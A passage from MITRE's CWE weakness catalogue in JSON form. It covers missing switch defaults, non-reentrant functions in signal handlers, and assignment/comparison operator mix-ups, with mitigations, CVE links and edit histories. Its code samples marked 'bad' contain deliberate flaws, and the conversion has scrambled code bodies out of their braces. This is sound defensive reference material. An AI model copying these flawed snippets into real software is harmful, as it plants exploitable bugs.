exiting...\\\\n\\",result);exit(-1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}}],"Body_Text":["Instead a default label should be used for unaccounted conditions:","This label is used because the assumption cannot be made that all possible cases are accounted for. A good practice is to reserve the default case for error handling."]},{"Intro_Text":"In the following Java example the method getInterestRate retrieves the interest rate for the number of points for a mortgage. The number of points is provided within the input parameter and a switch statement will set the interest rate value to be returned based on the number of points.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public static final String INTEREST_RATE_AT_ZERO_POINTS = \\"5.00\\";public static final String INTEREST_RATE_AT_ONE_POINTS = \\"4.75\\";public static final String INTEREST_RATE_AT_TWO_POINTS = \\"4.50\\";...public BigDecimal getInterestRate(int points) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);switch (points) {}return result;","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 0:case 1:case 2:","xhtml:div":[{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public static final String INTEREST_RATE_AT_ZERO_POINTS = \\"5.00\\";public static final String INTEREST_RATE_AT_ONE_POINTS = \\"4.75\\";public static final String INTEREST_RATE_AT_TWO_POINTS = \\"4.50\\";...public BigDecimal getInterestRate(int points) {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BigDecimal result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);switch (points) {}return result;","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case 0:case 1:case 2:default:","xhtml:div":[{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ZERO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_ONE_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"result = new BigDecimal(INTEREST_RATE_AT_TWO_POINTS);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.err.println(\\"Invalid value for points, must be 0, 1 or 2\\");System.err.println(\\"Returning null value for interest rate\\");result = null;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}}}}}],"Body_Text":"However, this code assumes that the value of the points input parameter will always be 0, 1 or 2 and does not check for other incorrect values passed to the method. This can be easily accomplished by providing a default label in the switch statement that outputs an error message indicating an invalid value for the points input parameter and returning a null value."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Failure to account for default case in switch"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Switch Statements&#34;, Page 337"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Failure to Account for Default Case in Switch","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Use Default Case in Switch","attr":{"@_Date":"2009-05-27"}}]}},"479":{"attr":{"@_ID":"479","@_Name":"Signal Handler Use of a Non-reentrant Function","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program defines a signal handler that calls a non-reentrant function.","Extended_Description":{"xhtml:p":["Non-reentrant functions are functions that cannot safely be called, interrupted, and then recalled before the first call has finished without resulting in memory corruption. This can lead to an unexpected system state and unpredictable results with a variety of potential consequences depending on context, including denial of service and code execution.","Many functions are not reentrant, but some of them can result in the corruption of memory if they are used in a signal handler. The function call syslog() is an example of this. In order to perform its functionality, it allocates a small amount of memory as \\"scratch space.\\" If syslog() is suspended by a signal call and the signal handler calls syslog(), the memory used by both of these functions enters an undefined, and possibly, exploitable state. Implementations of malloc() and free() manage metadata in global structures in order to track which memory is allocated versus which memory is available, but they are non-reentrant. Simultaneous calls to these functions can cause corruption of the metadata."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"828","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"663","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"It may be possible to execute arbitrary code through the use of a write-what-where condition."},{"Scope":"Integrity","Impact":["Modify Memory","Modify Application Data"],"Note":"Signal race conditions often result in data corruption."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Require languages or libraries that provide reentrant functionality, or otherwise make it easier to avoid this weakness."},{"Phase":"Architecture and Design","Description":"Design signal handlers to only set flags rather than perform complex functionality."},{"Phase":"Implementation","Description":"Ensure that non-reentrant functions are not found in signal handlers."},{"Phase":"Implementation","Description":"Use sanity checks to reduce the timing window for exploitation of race conditions. This is only a partial solution, since many attacks might fail, but other attacks still might work within the narrower window, even accidentally.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, a signal handler uses syslog() to log a message:","Example_Code":{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"char *message;void sh(int dummy) {}int main(int argc,char* argv[]) {}","xhtml:br":["",""],"xhtml:div":[{"#text":"syslog(LOG_NOTICE,\\"%s\\\\n\\",message);sleep(10);exit(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"...signal(SIGHUP,sh);signal(SIGTERM,sh);sleep(10);exit(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},"If the execution of the first call to the signal handler is suspended after invoking syslog(), and the signal handler is called a second time, the memory allocated by syslog() enters an undefined, and possibly, exploitable state."]}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-0893","Description":"signal handler calls function that ultimately uses malloc()","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0893"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unsafe function call from a signal handler"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG30-C","Entry_Name":"Call only asynchronous-safe functions within signal handlers","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG34-C","Entry_Name":"Do not call signal() from within interruptible signal handlers"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP01-J","Entry_Name":"Never dereference null pointers"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 13, &#34;Signal Vulnerabilities&#34;, Page 791"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences"}],"Previous_Entry_Name":{"#text":"Unsafe Function Call from a Signal Handler","attr":{"@_Date":"2010-12-13"}}}},"480":{"attr":{"@_ID":"480","@_Name":"Use of Incorrect Operator","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The programmer accidentally uses the wrong operator, which changes the application logic in security-relevant ways.","Extended_Description":"These types of errors are generally the result of a typo.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"670","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"C++","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"Perl","@_Prevalence":"Sometimes"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic","Note":"This weakness can cause unintended logic to be executed and other unexpected application behavior."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"This weakness can be found easily using static analysis. However in some cases an operator might appear to be incorrect, but is actually correct and reflects unusual logic within the program."},{"Method":"Manual Static Analysis","Description":"This weakness can be found easily using static analysis. However in some cases an operator might appear to be incorrect, but is actually correct and reflects unusual logic within the program."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-140"},"Intro_Text":"The following C/C++ and C# examples attempt to validate an int input parameter against the integer value 100.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}printf(\\"Value is not valid\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Value is valid\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"bool isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}Console.WriteLine(\\"Value is not valid.\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Value is valid.\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"However, the expression to be evaluated in the if statement uses the assignment operator \\"=\\" rather than the comparison operator \\"==\\". The result of using the assignment operator instead of the comparison operator causes the int variable to be reassigned locally and the expression in the if statement will always evaluate to the value on the right hand side of the expression. This will result in the input value not being properly validated, which can cause unexpected results."},{"attr":{"@_Demonstrative_Example_ID":"DX-103"},"Intro_Text":"The following C/C++ example shows a simple implementation of a stack that includes methods for adding and removing integer values from the stack. The example uses pointers to add and remove integer values to the stack array variable.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#define SIZE 50int *tos, *p1, stack[SIZE];void push(int i) {}int pop(void) {}int main(int argc, char *argv[]) {}","xhtml:br":["","","","","","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"p1++;if(p1==(tos+SIZE)) {}*p1 == i;","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack overflow error message and exit"}}}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(p1==tos) {}p1--;return *(p1+1);","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// Print stack underflow error message and exit"}},"xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"tos = stack;p1 = stack;...return 0;","xhtml:br":["","","","","",""],"xhtml:i":["// initialize tos and p1 to point to the top of stack","// code to add and remove items from stack"]}}]}},"Body_Text":["The push method includes an expression to assign the integer value to the location in the stack pointed to by the pointer variable.","However, this expression uses the comparison operator \\"==\\" rather than the assignment operator \\"=\\". The result of using the comparison operator instead of the assignment operator causes erroneous values to be entered into the stack and can cause unexpected results."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using the wrong operator"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP45-C","Entry_Name":"Do not perform assignments in selection statements","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP46-C","Entry_Name":"Do not use a bitwise operator with a Boolean-like operand","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in Computation"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Typos&#34;, Page 289"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Detection_Factors, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Relationships"}],"Previous_Entry_Name":{"#text":"Using the Wrong Operator","attr":{"@_Date":"2008-04-11"}}}},"481":{"attr":{"@_ID":"481","@_Name":"Assigning instead of Comparing","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses an operator for assignment when the intention was to perform a comparison.","Extended_Description":"In many languages the compare statement is very close in appearance to the assignment statement and are often confused. This bug is generally the result of a typo and usually causes obvious problems with program execution. If the comparison is in an if statement, the if statement will usually evaluate the value of the right-hand side of the predicate.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"480","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Alter Execution Logic"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Testing","Description":"Many IDEs and static analysis products will detect this problem."},{"Phase":"Implementation","Description":"Place constants on the left. If one attempts to assign a constant with a variable, the compiler will produce an error."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-140"},"Intro_Text":"The following C/C++ and C# examples attempt to validate an int input parameter against the integer value 100.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}printf(\\"Value is not valid\\\\n\\");return(0);","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"printf(\\"Value is valid\\\\n\\");return(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}},{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"bool isValid(int value) {}","xhtml:div":{"#text":"if (value=100) {}Console.WriteLine(\\"Value is not valid.\\");return false;","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Console.WriteLine(\\"Value is valid.\\");return true;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":"However, the expression to be evaluated in the if statement uses the assignment operator \\"=\\" rather than the comparison operator \\"==\\". The result of using the assignment operator instead of the comparison operator causes the int variable to be reassigned locally and the expression in the if statement will always evaluate to the value on the right hand side of the expression. This will result in the input value not being properly validated, which can cause unexpected results."},{"Intro_Text":"In this example, we show how assigning instead of comparing can impact code when values are being passed by reference instead of by value. Consider a scenario in which a string is being processed from user input. Assume the string has already been formatted such that different user inputs are concatenated with the colon character. When the processString function is called, the test for the colon character will result in an insertion of the colon character instead, adding new input separators. Since the string was passed by reference, the data sentinels will be inserted in the original string (CWE-464), and further processing of the inputs will be altered, possibly malformed..","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void processString (char *str) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int i;for(i=0; i&lt;strlen(str); i++) {}","xhtml:br":["",""],"xhtml:div":{"#text":"if (isalnum(str[i])){}else if (str[i] = \':\') {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"processChar(str[i]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"movingToNewInput();}","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}}}},{"Intro_Text":"The following Java example attempts to perform some processing based on the boolean value of the input parameter. However, the expression to be evaluated in the if statement uses the assignment operator \\"=\\" rather than the comparison operator \\"==\\". As with the previous examples, the variable will be reassigned locally and the expression in the if statement will evaluate to true and unintended processing may occur.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void checkValid(boolean isValid) {}","xhtml:div":{"#text":"if (isValid = true) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"System.out.println(\\"Performing processing\\");doSomethingImportant();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"Not Valid, do not perform processing\\");return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public void checkValid(boolean isValid) {}","xhtml:div":{"#text":"if (isValid) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"System.out.println(\\"Performing processing\\");doSomethingImportant();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"Not Valid, do not perform processing\\");return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public void checkValid(boolean isValid) {}","xhtml:div":{"#text":"if (!isValid) {}System.out.println(\\"Performing processing\\");doSomethingImportant();","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.out.println(\\"Not Valid, do not perform processing\\");return;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},"xhtml:br":["",""]}}}],"Body_Text":["While most Java compilers will catch the use of an assignment operator when a comparison operator is required, for boolean variables in Java the use of the assignment operator within an expression is allowed. If possible, try to avoid using comparison operators on boolean variables in java. Instead, let the values of the variables stand for themselves, as in the following code.","Alternatively, to test for false, just use the boolean NOT operator."]},{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void called(int foo){}int main() {}","xhtml:div":[{"#text":"if (foo=1) printf(\\"foo\\\\n\\");","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"called(2);return 0;","xhtml:br":["",""]}}],"xhtml:br":""}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Assigning instead of comparing"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP45-C","Entry_Name":"Do not perform assignments in selection statements","Mapping_Fit":"CWE More Abstract"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Typos&#34;, Page 289"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"}]}},"482":{"attr":{"@_ID":"482","@_Name":"Comparing instead of Assigning","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code uses an operator for comparison when the intention was to perform an assignment.","Extended_Description":"In many languages, the compare statement is very close in appearance to the assignment statement; they are often 